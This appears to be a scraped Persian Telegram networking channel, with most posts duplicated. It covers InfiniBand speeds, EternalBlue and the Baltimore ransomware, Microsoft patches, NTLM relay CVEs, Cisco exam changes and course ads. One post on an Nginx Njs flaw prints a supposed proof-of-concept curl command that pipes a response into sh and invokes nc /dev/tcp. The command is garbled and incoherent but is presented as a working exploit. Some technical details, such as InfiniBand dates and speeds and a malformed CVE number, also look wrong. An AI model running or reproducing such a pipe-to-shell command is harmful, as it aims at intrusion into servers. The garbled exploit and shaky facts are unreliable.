futures Network
switch of melanox IB XDR port status
در مورد پورتهای IB یا همان InfiniBand سوالاتی از من شده که دوست دارم کمی در مورد آن توضیح بدم.
بطورکلی استاندارد اترنت سالهای سال است که استاندارد شماره یک دنیای شبکه بوده است. از زمان ابداع شبکه های Thicknet در سال 1980 تا کنون مرتب رکورد سرعت در اترنت شکسته شده است ولی در سالهای اخیر با مطرح شدن HPC یا High Performance Computing ظاهرا اترنت کمی در ارتباطات شبکه عقب افتاده است. بخصوص در حوزه Storage و با پدیدار شدن داده های کلان سرعت ذخیره و بازیابی اطلاعات به مرز انفجار رسیده است.
از طرفی استاندارد اترنت دارای زمان تاخیر نسبتا زیادی در زمان ارسال داده های حجیم می باشد که مشکل متخصصان شبکه را دو چندان می کند.
تکنولوژی IB در اصل برای حل دو مشکل فوق ابداع و گسترش یافت.در سال 2014 دو غول دنیای HPC و SC، یعنی اینتل و ملانوکس، شروع به ساخت کارت های شبکه و سوئیچ هائی با پورت IB نمودند.که بعدها اوراکل، ماکروسافت، رد هت، وی ام ویر، اچ پی و دیگر غولهای جهان به سمت این تکنولوژی گرایش پیدا نمودند.
چندین خانواده از IB تا کنون به بازار عرضه شده است. تکنولوژی هائی نظیر :
SDR, DDR, QDR, FDR, EDR, HDR, NDR, XDR
هر یک از تکنولوژی های فوق با سرعت لینک های متفاوتی عرضه می شود.سرعت لینک های فعلی
1X, 4X, 8X, 12X
می باشند که سرعت واقعی هر پورت در این اعداد ضرب می شوند.
برای مثال پورتهای EDR به شکل پیش فرض دارای سرعت 25gbps می باشند که اگر یک پورت 8X آن در سوئیچ یا کارت شبکه ای باشد، سرعت آن پورت به 200gbps می رسد.
هم اکنون شرکت ملانوکس پورتهای XDR را در تجهیزات سطح بالایش استفاده می کند که سرعت پورت ای آن عدد سرسام آور 250gbps می باشد که اگر یک پورت 12X آن خریداری شود به سرعت باورنکردی 3Tbps می رسیم.
#Infiniband
#IB
#Melanox
#Speed
بطورکلی استاندارد اترنت سالهای سال است که استاندارد شماره یک دنیای شبکه بوده است. از زمان ابداع شبکه های Thicknet در سال 1980 تا کنون مرتب رکورد سرعت در اترنت شکسته شده است ولی در سالهای اخیر با مطرح شدن HPC یا High Performance Computing ظاهرا اترنت کمی در ارتباطات شبکه عقب افتاده است. بخصوص در حوزه Storage و با پدیدار شدن داده های کلان سرعت ذخیره و بازیابی اطلاعات به مرز انفجار رسیده است.
از طرفی استاندارد اترنت دارای زمان تاخیر نسبتا زیادی در زمان ارسال داده های حجیم می باشد که مشکل متخصصان شبکه را دو چندان می کند.
تکنولوژی IB در اصل برای حل دو مشکل فوق ابداع و گسترش یافت.در سال 2014 دو غول دنیای HPC و SC، یعنی اینتل و ملانوکس، شروع به ساخت کارت های شبکه و سوئیچ هائی با پورت IB نمودند.که بعدها اوراکل، ماکروسافت، رد هت، وی ام ویر، اچ پی و دیگر غولهای جهان به سمت این تکنولوژی گرایش پیدا نمودند.
چندین خانواده از IB تا کنون به بازار عرضه شده است. تکنولوژی هائی نظیر :
SDR, DDR, QDR, FDR, EDR, HDR, NDR, XDR
هر یک از تکنولوژی های فوق با سرعت لینک های متفاوتی عرضه می شود.سرعت لینک های فعلی
1X, 4X, 8X, 12X
می باشند که سرعت واقعی هر پورت در این اعداد ضرب می شوند.
برای مثال پورتهای EDR به شکل پیش فرض دارای سرعت 25gbps می باشند که اگر یک پورت 8X آن در سوئیچ یا کارت شبکه ای باشد، سرعت آن پورت به 200gbps می رسد.
هم اکنون شرکت ملانوکس پورتهای XDR را در تجهیزات سطح بالایش استفاده می کند که سرعت پورت ای آن عدد سرسام آور 250gbps می باشد که اگر یک پورت 12X آن خریداری شود به سرعت باورنکردی 3Tbps می رسیم.
#Infiniband
#IB
#Melanox
#Speed
📖 نام کتاب: CCNA Routing & Switching
📚نشر: انتشارات ناقوس
📄 تعداد صفحات: 454
💰 قیمت اصلی:85000 تومان
🎁 40 درصد تخفیف ویژه با کد MrNetwork
📆 این کد تا پایان اردیبهشت 98 اعتبار دارد
مشاهده سرفصل و تهیه کتاب:
Telegram: @easynet_ir
Tel: 09014296347
📚نشر: انتشارات ناقوس
📄 تعداد صفحات: 454
💰 قیمت اصلی:85000 تومان
🎁 40 درصد تخفیف ویژه با کد MrNetwork
📆 این کد تا پایان اردیبهشت 98 اعتبار دارد
مشاهده سرفصل و تهیه کتاب:
Telegram: @easynet_ir
Tel: 09014296347
آژانس امنیت ملی آمریکا (NSA) تاکنون ابزارهای هکری مختلفی را بهمنظور انجام عملیات گوناگون توسعه داده است. با وجود این در سال 2017 گروهی هکری به نام «کارگزاران سایه» (Shadow Brokers) -که هویت آنها نامشخص است- بدافزارهای یاد شده را سرقت کرده و به صورت عمومی منتشر ساختند. حال به نظر میرسد از همین نرمافزارهای مخرب به منظور حمله به سامانههای سراسر آمریکایی استفاده میشود.
در اوایل ماه می 2019، اعلام شد که رایانهی دولتی شهر بالتیمور ایالت مریلند، توسط یک باج افزار موردتهاجم قرار گرفته است. با توجه به بررسیهای صورت گرفته، بدافزار مورداستفاده در این حمله، «اترنال بلو» (EternalBlue) نام دارد که یکی از ابزارهای هکری آژانس امنیت ملی آمریکا به حساب میآید. اترنال بلو به هکرها اجازه میدهد از راه دور به سیستم قربانی دسترسی پیدا کرده، کنترل آن را در دست بگیرند.
مجرمان سایبری با استفاده از اترنال بلو موج جدیدی از حملات را به اهداف آسیبپذیر مقامات دولتی شهرهای مختلف مانند بالتیمورآغاز کردهاند. ساختمان دولتی مورد هدف واقع شده در بالتیمور، در نزدیکی مرکز فرماندهی آژانس امنیت ملی قرار دارد.
هکرها در تاریخ 7 می، هزاران رایانهی موجود در بالتیموررا هدف قرار داده، آنها را از کار انداختند. به دنبال اتفاق یاد شده حجم عظیمی از ایمیلها، صورتحسابهای آب، هشدارهای بهداشت و درمان و بسیاری از خدمات شهری دیگر در این منطقه از کار افتاد.
مقامات بالتیموراعلام کردند هکر مذکور، یکصد هزار دلار باج درخواست کرده است.
در اوایل ماه می 2019، اعلام شد که رایانهی دولتی شهر بالتیمور ایالت مریلند، توسط یک باج افزار موردتهاجم قرار گرفته است. با توجه به بررسیهای صورت گرفته، بدافزار مورداستفاده در این حمله، «اترنال بلو» (EternalBlue) نام دارد که یکی از ابزارهای هکری آژانس امنیت ملی آمریکا به حساب میآید. اترنال بلو به هکرها اجازه میدهد از راه دور به سیستم قربانی دسترسی پیدا کرده، کنترل آن را در دست بگیرند.
مجرمان سایبری با استفاده از اترنال بلو موج جدیدی از حملات را به اهداف آسیبپذیر مقامات دولتی شهرهای مختلف مانند بالتیمورآغاز کردهاند. ساختمان دولتی مورد هدف واقع شده در بالتیمور، در نزدیکی مرکز فرماندهی آژانس امنیت ملی قرار دارد.
هکرها در تاریخ 7 می، هزاران رایانهی موجود در بالتیموررا هدف قرار داده، آنها را از کار انداختند. به دنبال اتفاق یاد شده حجم عظیمی از ایمیلها، صورتحسابهای آب، هشدارهای بهداشت و درمان و بسیاری از خدمات شهری دیگر در این منطقه از کار افتاد.
مقامات بالتیموراعلام کردند هکر مذکور، یکصد هزار دلار باج درخواست کرده است.
انتشار وصله امنیتی مهم ( مایکروسافت ) !!!
انتشار وصلهیهای امنیتی رایگان remote desktop مایکروسافت برای نسخههای قدیمی ویندوز جهت جلوگیری از بروز مجدد حملات WannaCry
مایکروسافت در بهروزرسانی ماه می سال 2019 خود، 79 آسیبپذیری از جمله یک آسیبپذیری در سیستمعاملهای قدیمی Windows XP و Server 2003 که دیگر از آنها پشتیبانی نمیکند را وصله کرده است
انتشار وصلهیهای امنیتی رایگان remote desktop مایکروسافت برای نسخههای قدیمی ویندوز جهت جلوگیری از بروز مجدد حملات WannaCry
مایکروسافت در بهروزرسانی ماه می سال 2019 خود، 79 آسیبپذیری از جمله یک آسیبپذیری در سیستمعاملهای قدیمی Windows XP و Server 2003 که دیگر از آنها پشتیبانی نمیکند را وصله کرده است
🔺آسیبپذیری بحرانی در وبسرور Nginx
وبسرور Nginx در هستهی خود از یک زبان اسکریپتی با نام Njs پشتیبانی میکند که به کاربران اجازهی گسترش کارکرد nginx (مثل دستکاری سرآیندهای پاسخ و کنترل دسترسیهای یک درخواست HTTP قبل از اینکه به سرور بالادستی برسد) را میدهد. به نظر میرسد در ساختار این زبان، باگهای خطرناکی همچون Integer Overflow وجود دارد که تخریب حافظه Heap را در بر میدارد. این تهدید به مهاجمین امکان توسعهی اکسپلویت و دسترسی از راه دور را فراهم میآورد. پیشنهاد موکد میشود که در اسرع وقت نسبت به بهروزرسانی، اقدامات لازم انجام شود.
اثبات مفهومی از این آسیبپذیری منتشر شده که نیازمند تست است:
curl -gsS https://<VICTIMSERVER>:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
وبسرور Nginx در هستهی خود از یک زبان اسکریپتی با نام Njs پشتیبانی میکند که به کاربران اجازهی گسترش کارکرد nginx (مثل دستکاری سرآیندهای پاسخ و کنترل دسترسیهای یک درخواست HTTP قبل از اینکه به سرور بالادستی برسد) را میدهد. به نظر میرسد در ساختار این زبان، باگهای خطرناکی همچون Integer Overflow وجود دارد که تخریب حافظه Heap را در بر میدارد. این تهدید به مهاجمین امکان توسعهی اکسپلویت و دسترسی از راه دور را فراهم میآورد. پیشنهاد موکد میشود که در اسرع وقت نسبت به بهروزرسانی، اقدامات لازم انجام شود.
اثبات مفهومی از این آسیبپذیری منتشر شده که نیازمند تست است:
curl -gsS https://<VICTIMSERVER>:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Forwarded from Honaroweb
شروع دوره نیمه خصوصی طراحی وب و مدیریت محتوا پنل وردپرس (فروشگاهی،تجاری، شخصی) طراحی حرفه ای پنل و قالب مشابه دیجی کالا و دیوار همچنین هدیه قالب حرفه ای طراحی شده به کاراموزان دوره تابستان همچنین مناسب افرادی که دارای کسب و کار شخصی هستند و نیاز به مدیریت محتوا بدون هیچ پشتیبانی را دارند. جهت هماهنگی و اطلاع ثبت نام با شماره زیر تماس حاصل فرمایید:
مهلت ثبت نام تا ۳۰خرداد
شروع دوره ۵تیر
هزینه دوره:۵۵۰ت با محاسبه تخفیف ۳۰درصدی مدت زمان دوره:۳۰ساعت
با ارائه مدرک معتبر
جهت مشاوره و ثبت نام:
۰۲۱۶۶۹۴۸۳۹۵
#طراحی_وب#وردپرس_مقدماتی_تا_پیشرفته
مهلت ثبت نام تا ۳۰خرداد
شروع دوره ۵تیر
هزینه دوره:۵۵۰ت با محاسبه تخفیف ۳۰درصدی مدت زمان دوره:۳۰ساعت
با ارائه مدرک معتبر
جهت مشاوره و ثبت نام:
۰۲۱۶۶۹۴۸۳۹۵
#طراحی_وب#وردپرس_مقدماتی_تا_پیشرفته
آخرین بروزرسانی از BGP AS های ایران به همراه آمار تعداد روتها و همسایگی های آی پی نسخه ۴ و ۶
#BGP
#AS
#Adjacencies
کانال آموزش شبکه
🆔 @futuresnet
#BGP
#AS
#Adjacencies
کانال آموزش شبکه
🆔 @futuresnet
خبر آموزشی بسیار مهم !!!
شرکت سیسکو دقایقی پیش رسما اعلام کرد کلیه آزمون های سری CCNA , CCNP در تمامی گرایش ها در تاریخ ۲۳ فوریه ۲۰۲۰ بروز رسانی خواهد شد .
دوستانی که با شرایط فعلی میخواهند در دوره های مرتبط شرکت و آزمون خود را به پایان برسانند ، عجله کنند .
( روی یک ماه آخر زمان باقی مانده برای مراجعه به مراکز رسمی آزمون بین المللی خیلی حساب نکنید !!! )
@futuresnet
شرکت سیسکو دقایقی پیش رسما اعلام کرد کلیه آزمون های سری CCNA , CCNP در تمامی گرایش ها در تاریخ ۲۳ فوریه ۲۰۲۰ بروز رسانی خواهد شد .
دوستانی که با شرایط فعلی میخواهند در دوره های مرتبط شرکت و آزمون خود را به پایان برسانند ، عجله کنند .
( روی یک ماه آخر زمان باقی مانده برای مراجعه به مراکز رسمی آزمون بین المللی خیلی حساب نکنید !!! )
@futuresnet
🔺 لزوم توجه به دو آسیب پذیری (دور خوردن احراز هویت) مایکروسافت توسط تیم های امنیت سازمانها
یکی از آسیب پذیری هایی که اخیرا توسط مهاجمین در حملات مختلف مورد استفاده قرار گرفته تحت شناسه CVE-2019-1040 و CVE-219-1019 شناخته می شه که مهاجم رو قادر می کنه که یا کدمخرب خودش رو از راه دور و بر روی هر پلت فرم ویندوزی اجرا کنه و یا به هر وب سروری که از WIA ( Windows Integrated Authentication ) پشتیبانی می کنه بتونه بصورت کامل فرایند احرازهویت رو انجام بده و دور بزنه. (برای مثال سرویس Exchange و ADFS از این قابلیت پشتیبانی می کنند)
بر طبق جزئیات منتشر شده این دو CVE از سه ضعف منطقی در NTLM ناشی می شود و با سواستفاده موفق از این آسیب پذیری می توان اعمالی نظیر خواندن تمامی ایمیل های کاربران، انجام فرایند احرازهویت بر روی هر منبع ابری که بوسیله ADFS کنترل می شود و یا اجرای کدمخرب بر روی سیستم قربانی به منظور تغییر بر روی پیکربندی شبکه به منظور ایجاد یک درب پیشتی را انجام داد.
لازم به یادآوری هست که NTLM نسبت به حملات Relay بسیار مستعد است و همین امر مهاجم را قادر می سازد که فرایند احرازهویت را ضبط کرده و آن را بر روی سرور دیگری به منظور انجام عملیات های مختلف با استفاده از امتیازات کاربر تایید شده، Relay کند. این حمله از حملات مرسومی است که علیه سرویس های Active Directory انجام می شود.
برای اطلاعات بیشتر می توانید به لینک های CVE-2019-1040 و CVE-2019-1019 مراجعه کنید
یکی از آسیب پذیری هایی که اخیرا توسط مهاجمین در حملات مختلف مورد استفاده قرار گرفته تحت شناسه CVE-2019-1040 و CVE-219-1019 شناخته می شه که مهاجم رو قادر می کنه که یا کدمخرب خودش رو از راه دور و بر روی هر پلت فرم ویندوزی اجرا کنه و یا به هر وب سروری که از WIA ( Windows Integrated Authentication ) پشتیبانی می کنه بتونه بصورت کامل فرایند احرازهویت رو انجام بده و دور بزنه. (برای مثال سرویس Exchange و ADFS از این قابلیت پشتیبانی می کنند)
بر طبق جزئیات منتشر شده این دو CVE از سه ضعف منطقی در NTLM ناشی می شود و با سواستفاده موفق از این آسیب پذیری می توان اعمالی نظیر خواندن تمامی ایمیل های کاربران، انجام فرایند احرازهویت بر روی هر منبع ابری که بوسیله ADFS کنترل می شود و یا اجرای کدمخرب بر روی سیستم قربانی به منظور تغییر بر روی پیکربندی شبکه به منظور ایجاد یک درب پیشتی را انجام داد.
لازم به یادآوری هست که NTLM نسبت به حملات Relay بسیار مستعد است و همین امر مهاجم را قادر می سازد که فرایند احرازهویت را ضبط کرده و آن را بر روی سرور دیگری به منظور انجام عملیات های مختلف با استفاده از امتیازات کاربر تایید شده، Relay کند. این حمله از حملات مرسومی است که علیه سرویس های Active Directory انجام می شود.
برای اطلاعات بیشتر می توانید به لینک های CVE-2019-1040 و CVE-2019-1019 مراجعه کنید
تلگرام امروز اعلام کرد، سرورهایش زیر حملات شدید DDoS میباشد و ممکن است کاربران آمریکا و برخی دیگر از کشورها با اختلالاتی مواجه شوند
@futuresnet
@futuresnet